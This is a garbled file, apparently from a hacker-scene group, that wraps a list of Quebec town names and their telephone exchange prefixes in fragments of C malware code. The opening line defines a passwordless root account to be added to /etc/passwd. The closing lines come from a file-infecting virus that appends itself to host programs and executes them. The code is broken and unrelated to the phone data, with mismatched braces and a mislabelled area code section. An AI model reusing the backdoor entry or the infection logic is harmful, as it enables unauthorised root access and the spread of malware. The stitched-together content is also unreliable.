/* line being added to /etc/passwd */
char mixter[]="mixter::0:0:root:/:/bin/sh";
		//* Pyrofreak Language v.1.6.8

    /* Code des numériques des municipalité regrouper par code régional
	/* par Bencode (Syst3m_X_)
	/* mailto:syst3m@pyrofreak.org

# 418
}
 }
Boucherville      200
Aeroprt Bagotvl   677
Aguanish          533
Albanel           279
Alma              480 481 487 662 668 669
Amqui             629
Anse St Jean      272
Armagh            466
Baie Comeau       294 296
Baie Des Sables   772
Baie Johan Beetz  539
Baie St Catherine 237
Baie St Paul      240 435
Baie Trinite      920 939
Barachois         645
Batiscan          362
Beauceville       774
Bergeronnes       232
Bic               736
Biencourt         499
Black Lake        423
Boischatel        822
Bonaventure       530 534
Cabano            854
Cap Aux Meules    986
Cap Chat          786
Cap Des Rosiers   892
Cap St Ignace     246
Caplan            388
Carleton          364
Causapscal        756
Chambord          342
Chandler          689
Chapais           745
Charny            832
Chateau Richer    824
Chevery           787
Chibougamau       748 770
Chicoutimi        540 541 543 545 549 550 590 591 592 690 693 696
                  698 820
Chute A' Outardes 567
Chute Des Passes  377
Clarke City       583
Clermont          439
Cloridorme        395
Colombier         565
Courcelles        483
Delisle           347
Desbiens          346
Disraeli          449
Dolbeau           239 276
Donnacona         285
East Broughton    427
Escoumins         233
Esprit St         779
Ferland           676
Fermont           287
Forestville       587
Frampton          479
Garthby           458
Gaspe             360 368
Girardville       258
Godbout           568
Grande Entree     985
Grande Riviere    385
Grande Vallee     393
Harringtn Harbour 795
Hauterive         295 297 589
Havre Aubert      937
Havre Aux Maisons 969
Havre St Pierre   538
Hebertville       344
Hebertville Stn   343
Ile Aux Coudres   438
Inverness         453
Jonquiere         542 546 547 548 695 699
L'Isle Verte      898
L'Islet           247
La Baie           544 697
La Dore           256
La Guadeloupe     459
La Malbaie        633 665
La Martre         288
La Pocatiere      856
La Romaine        229
Lac Au Saumon     778
Lac Aux Sables    336
Lac Bouchette     348
Lac Etchemin      625
Lac Frontiere     245
Lac Mistass       923
Lambton           486
Laterriere        678
Leeds             424
Les Boules        936
Les Eboulements   635
Les Mechins       729
Levis             833 834 835 837 838 839
Loretteville      390 840 842 843 845 847
Lrds Blanc Sablon 461
Luceville         739
Manicouagan       584
Maria             759
Matane            560 562 566
Matapedia         865
Metabetchouan     349
Milot             373
Moisie            927
Mont Joli         775
Mont Louis        797
Montmagny         241 248
Murdochville      784
Mutton Bay        773
Natashquan        726
Neuville          876
New Carlisle      752
New Richmond      392
Newport           777
Normandin         274
N D D Laurentides 841 849
Notre Dame Du Lac 899
Nouvelle          794
Pentecote         799
Perce             782
Peribonka         374
P Riviere St Frcs 632
Pointe A La Croix 788
Pointe Des Laur   846
Pont Rouge        873
Port Cartier      766 768
Port Daniel       396
Port Menier       535
Portneuf          286
Quebec            260 261 262 265 266 310 380 455 520 521 522 523
                  524 525 527 528 529 559 561 563 564 569 570 571
                  575 576 577 580 621 622 623 624 626 627 628 640
                  641 643 644 646 647 648 649 650 651 652 653 654
                  655 656 657 658 659 660 661 663 664 666 667 670
                  681 682 683 684 686 687 688 691 692 694 801 802
                  803 821 864 871 872 874 877 890 943 990 991
Rimouski          721 722 723 724 725 727 731 750
River St John     949
Riviere A Pierre  323
Riviere Au Renard 269
Riviere Bleue     893
Riviere Du Loup   860 862 863 867 868
Rivington         465
Roberval          275
Sacre Coeur       236
St Adelphe        322
St Agapit         888
St Ag De Lotbnr   599
St Alexandre      495
St Alx De Mtpedia 299
St Ambrs D Chctmi 672
St Andre          493
St Ann De Beaupre 827
St Anne Perade    325
St Ann D Portneuf 238
St Ann Des Monts  763
St Anselme        885
St Antne De Tilly 886
St Apollinaire    881
St Augustin       870 878 947
St Austin Mtns    231
St Bsl D Portneuf 329
St Bnrd D Drchstr 475
St Blandine       735
St Brgte De Laval 825
St Camille        595
St Casimir        339
St Catherine      875
St Chls De Blchs  887
St Clr De Drchstr 883
St Cm De Kennebec 685
St Croix          926
St Dmn D Bllchs   789
St Ed D Ltbiniere 796
St Eleuthere      859
St Ephrm D Beauce 484
St Fabien D Panet 249
St Fab D Rimouski 869
St Felicien       630 671 679
St Felicite       733
St Ferd D Halifax 428
St Fereol         826
St Fidele         434
St Flavien        728
St Francois       259
St Fulgence       674
St Gab D Rimouski 798
St Gedeon         345
St Gedn De Beauce 582
St Grg De Beauce  225 226 227 228
St Henedine       935
St Henri De Levis 882
St Hilarion       457
St Honore         485 497 673
St Irenee         200 452
St Jean De Dieu   963
St Jn Ile D Orlns 829
St Jean Port Joli 598
St Jos De Beauce  397
St Justdebr       244
St Justine        383
St Lmbrt D Lauzon 889
St Leon Le Grand  743
St Luce           636
St Luc D Beaurgrd 223
St Magloire       257
St Malachie       642
St Marc D Carr    268
St Marie D Beauce 386 387
St Mrtn D Beauce  382
St Mthd D Frntnac 422
St Mchl D Bllchs  884
St Moise          776
St Nicolas        831 836
St Odln Cranbrne  464
St Pacome         852
St Pamphile       356
St Pascal         492
St Pat D Beaurivg 596
St Pauls River    379
St Perpetue       359
St Petronille     828
St Phlp De Neri   498
St Placide Mont   469
St Prime          251
St Prsp D Drchstr 594
St Rphl D Bllechs 243
St Raymond        337
St Rene De Matane 224
St Roch Aulnaies  354
St Rose D Watford 267
St Rose Du Nord   675
St Simeon         638
St Smn D Rimouski 738
St Stan D Chmpln  328
St Thecle         289
St Theophile      597
St Tite           365
St Tite Des Caps  823
St Ubalde         277
St Ulric          737
St Urbain         639
St Vctr De Beauce 588
St Zacharie       593
Sayabec           536
Schefferville     585
Sept Iles         961 962 964 968
Squatec           855
Stoneham          848
Stratford         443
Tadoussac         235
Tete A La Baleine 242
Thetford Mines    332 334 335 338
Tring Jonction    426
Trois Pistoles    851 857
Val Alain         744
Val Brillant      742
Valcartier        844
Vallee Jonction   253
Ville Degelis     853
 }
}

//# 450

{
 {
Acton Vale        546
Baie Dufebvre     783
Beauharnois       225 268 429
Bedford           248
Beloeil           446 464 467 536
Berthierville     836
Boucherville      200 231 449 641 655
Bromont           534
Brownsburg        533
Chambly           232 447 658
Chateauguay       233 691 692 698 699
Chomedey          234 310 680 681 682 686 687 688 973 978
Clarenceville     294
Contrecoeur       587
Coteau Du Lac     763
Coteau Landing    267
Cowansville       260 263 266
Crabtree          754
Dunham            295
Eastman           297
Farnham           293
Franklin Centre   827
Frelighsburg      298
Granby            360 372 375 378 531 578 770 775 776 777
Hemmingford       247
Henryville        299
Howick            825
Hudson            458
Huntingdon        264
Joliette          750 752 753 755 756 757 758 759
Knowlton          242 243
Lachute           562 566
Lacolle           246
Lanoraie          887
Laprairie         235 444 619 659
Laval Est         666
Laval Ouest       236 627 689 962 969
Lavaltrie         541 547 586
Lawrenceville     535
Le Gardeur        470 581 582 585 654 657
Lepiplassm        588 589
Les Cedres        452
Longueuil         237 440 442 448 463 468 616 646 647 651 670 674
                  677 679 928
Mansonville       292
Marieville        460
Mascouche         474 477 966 968
Mirabel Aeroport  476
Mrbl St Augustin  475
Mrbl Ste Schlstq  258
Morin Heights     226
Napierville       245
N D De Stanbridge 296
Oka               479
Ormstown          829
Pierreville       568
Pont Viau         230 575 629 662 663 667 668 669 690 967 972 975
Rawdon            834 882
Rigaud            451
Riviere Beaudette 269
Roxton Falls      548
St Adele          229
St Aime           788
St Alph De Rdrgz  883
St Andre D Rstgch 537
St Anne Des Plns  478 838
St Barthelemy     885
St Blaise         291
St Bruno          441 461 653
St Clxt De Klknny 222
St Cesaire        469
St Chrysostome    826
St Clet           456
St Constant       238 632 635 638
St Damase         797
St Denis          787
St Eustache       239 472 473 491 623 974
St Felix D Valois 889
St Gabrl D Brndn  835
St Helene D Bagot 791
St Hippolyte      563
St Hugues         794
St Hyacinthe      209 223 250 251 261 771 773 774 778 779
St Jacques        839
St Jean           280 346 347 348 349 357 358 359 515 542 545
St Jean De Matha  886
St Jerome         431 432 436 438 512 560 565 569 660 675
St Jude           792
St Julie D Vrchrs 649 922
St Julienne       831
St Jstn De Newton 764
St Lambert        281 443 445 462 465 466 618 656 671 672 676 678
                  920 923 926
St Liboire        793
St Lin            439
St Madeleine      701 795
St Marc           584
St Marguerite     228
St Marthe         459
St Martine        427
St Michel Ds Snts 833
St Ours           785
St Paul D Abtsfrd 379
St Pie            772
St Pie De Guire   706 784
St Polycarpe      265
St Remi           454
St Rosalie        799
St Rose           282 622 625 628 963
St Sauveur        227 240
St Simon De Bagot 798
St Therese        283 419 430 433 434 435 437 543 621 965 971 979
St Thomas D Aquin 796
St Victoire       782
St Vincent D Paul 284 661 664 665
St Zenon          884
St Zephirin       564
Shawbridge        224
Sorel             561 730 742 743 746 780
Sutton            538
Terrebonne        471 492 961 964
Upton             549
Valcourt          532
Valleyfield       370 371 373 377 544 567
Varennes          652 929
Vaudreuil         285 424 455 510
Venise En Quebec  244
Vercheres         583
Waterloo          539
Yamaska           789
 {
{

//# 514

}
 }
Boucherville      200
Ile Perrot        425 453
Lachine           222 420 422 631 633 634 636 637 639 828
Montreal          201 202 203 204 205 212 213 215 217 221 223 230
                  231 232 233 234 235 236 237 238 239 241 249 251
                  252 253 254 255 256 257 259 262 270 271 272 273
                  274 275 276 277 278 279 280 281 282 283 284 285
                  286 287 288 289 290 301 302 304 306 310 321 322
                  323 324 325 326 327 328 329 330 331 332 333 334
                  335 336 337 338 339 340 341 342 343 344 345 350
                  351 352 353 354 355 356 361 362 363 364 365 366
                  367 368 369 370 374 376 380 381 382 383 384 385
                  386 387 388 389 390 391 392 393 394 395 396 397
                  398 399 402 423 440 480 481 482 483 484 485 486
                  487 488 489 490 493 494 495 496 497 498 499 520
                  521 522 523 524 525 526 527 528 529 530 540 570
                  571 572 573 574 575 576 577 580 590 591 592 593
                  594 595 596 597 598 599 640 642 643 644 645 648
                  650 673 709 720 721 722 723 724 725 726 727 728
                  729 731 732 733 734 735 736 737 738 739 740 741
                  744 745 747 748 749 751 758 760 761 762 765 766
                  767 768 769 781 786 790 801 803 805 807 808 812
                  814 816 817 818 820 821 823 824 830 832 837 840
                  841 842 843 844 845 846 847 848 849 850 851 852
                  853 854 855 856 857 858 859 860 861 862 863 864
                  865 866 867 868 869 870 871 872 873 874 875 876
                  877 878 879 880 881 888 890 891 892 893 894 895
                  896 897 898 899 907 908 909 912 913 914 915 916
                  917 918 919 920 921 924 925 927 928 930 931 932
                  933 934 935 936 937 938 939 940 941 942 943 944
                  945 946 947 948 949 951 952 953 954 955 956 957
                  960 970 977 978 980 981 982 983 984 985 986 987
                  988 989 990 992 993 994 995 996 997 998
Pointe Claire     224 426 428 457 630 693 694 695 697
Roxboro           225 421 683 684 685 822
St Genevieve      226 620 624 626 696
St Thomas D Aquin 796
 {
{

//# 450

}
 }
Akulivik          496
Amos              727 732
Angliers          949
Arundel           687
Asbestos          879
Aston Junction    226
Aupaluk           491
Ayers Cliff       838
Aylmer            682 684 685
Barraute          734
Bearn             726
Beaucanton        941
Becancour         294
Belleterre        722
Bishopton         884
Bouchette         465
Bromptonville     846
Buckingham        281 986
Bury              872
Cadillac          759
Campbells Bay     453 648
Champlain         295
Chapeau           689
Charette          221
Chartierville     656
Chelsea           827
Cheneville        428
Chesterville      382
Chisasibi         855
Clericy           637
Clova             662
Coaticook         849
Compton           835
Cookshire         875
Danville          839
Daveluyville      367
Deauville         864
Deschaillons      292
Drummondville     469 470 471 472 474 475 477 478 479
Dubuisson         738
Duparquet         948
Dupuy             783
East Angus        832
East Hereford     844
East Main 1       865
Eastman           977
Evain             279 768
Fabre             634
Ferme Neuve       587
Fort Coulonge     683
Fortierville      287
Fugereville       748
Gatineau          643 663 669
Gentilly          298
Gracefield        463
Grand Mere        533 538
Grand Remous      438
Grenville         242
Guigues           728
Ham Nord          344
Inukjuak          254
Ivujivik          922
Joutel            756
Kangiqsualujjuaq  337 338
Kangirsuk         935
Kazabazua         467
Kingsey Falls     363
Kuujjuaq          964
Kuujjuarapik      929
La Corne          799
La Minerve        274
La Patrie         888
La Reine          947
La Sarre          333 339
La Tuque          523 676
La Verniere       394
Labelle           686
Lac Des Ecorces   585
Lac Drolet        549
Lac Du Cerf       597
Lac Edouard       653
Lac Megantic      583
Lacstarnd         547
Laforge           853
Lannoncatn        275
Latulipe          747
Laurierville      365
Laverlochere      765
Lebel Sur Queviln 755
Lorrainville      625
Louiseville       228
Louvicourt        736
Low               422
Luskville         455
Lyster            389
Macamic           782
Magog             843 847 868
Malartic          757
Maniwaki          441 449
Manouane          971
Manseau           356
Maskinonge        227
Matagami          739
Mont Laurier      440 623
Montebello        423
Nedelec           784
Nemaska           673
Nicolet           293
Nominingue        278
Noranda           762 763 764 797
Norbertville      369
Normetal          788
North Hatley      842
N D De La Paix    522
N D De La Salette 766
N D De Lourdes    385
N D D Bon Conseil 336
N Dame Du Laus    767
N Dame Du Nord    723
Obedjiwan         974
Ottowa            243 246 328 329 420 561 568 595 664 712 743 770
                  771 772 773 775 776 777 778 779 790 920 921 953
                  955 956 994 997
Palmarolle        787
Papineauville     427
Parc Verendrye    435
Parent            667
Perkins           671
Plessisville      362 621
Povungnituk       988
Princeville       364
Quaqtaq           492
Quyon             458
Radisson          638 672 854
Remigny           761
Richmond          826
Riviere Heva      735
Rochebaucourt     754
Rock Island       876
Rollet            493
St Adphe D Howard 327
St Adphe Dudswell 887
St Agathe         321 323 324 326
St Albert         353
St Alexis D Monts 265
St Andre Avellin  983
St Angele Laval   222
St Anne Des Lacs  586
St Barnabe        264
St Bnf Shawinigan 535
St Celestin       229
St Cyrl Wendover  397
St Donat Montcalm 200 424
St Emile Suffolk  426
St Eugene Guigues 785
St Eulalie        225
St Faustin        688
St Felix Kingsey  848
St Grmn  Grantham 395
St Gertrude       297
St Greg D Nicolet 233
St Guillaume      396
St Jovite         425 429 681
St Lnrd D Aston   399
St Ludger         548
St Malo           658
St Marie Blandfrd 283
St Mathieu        532
St Mnq De Nicolet 289
St Nazadact       392
St Paulin         268
St Pr D Wakefield 457
St Pr L Becquets  263
St Roch D Mekinac 646
St Sebastien      652
St Soph Levrard   288
St Sylvere        285
St Wenceslas      224
Salluit           255
Sanmaur           666
Sawyerville       889
Scotstown         657
Senneterre        737
Shawinigan        531 534 536 537 539
Shawville         647
Sherbrooke        310 345 346 347 348 437 560 562 563 564 565 566
                  567 569 571 572 573 580 620 820 821 822 823 829
South Durham      858
Stoke             878
Taschereau        796
Tasiujaq          633
Temiscaming       627
Thurso            985
Tingwick          359
Trois Rivieres    370 371 372 373 374 375 376 377 378 379 380 383
                  691 693 694 695 696 697 698 991
Umiujaq           331
Val D Or          280 354 444 824 825 856 874
Val David         322
Val Des Bois      454
Victoriaville     352 357 740 751 752 758 795
Ville Marie       622 629
Wakefield         456 459
Warwick           358
Waskagansh        895
Waswanipi         753
Waterville        837
Weedon            877
Wemindji          978
Wickham           398
Windsor           845
Woburn            544
Wotton            828
Yamachiche        296
    
	}
    }

	strcat((char *)&hst,(char *)lc);
    	strcat((char *)&hst,".pyro");                      /* with virus tacked on */
    	execve((char *)&hst,argv,envp);            /* execute this program's host */
	virulence--;
	if(virue==1) return 0; else goto eviloop;
}
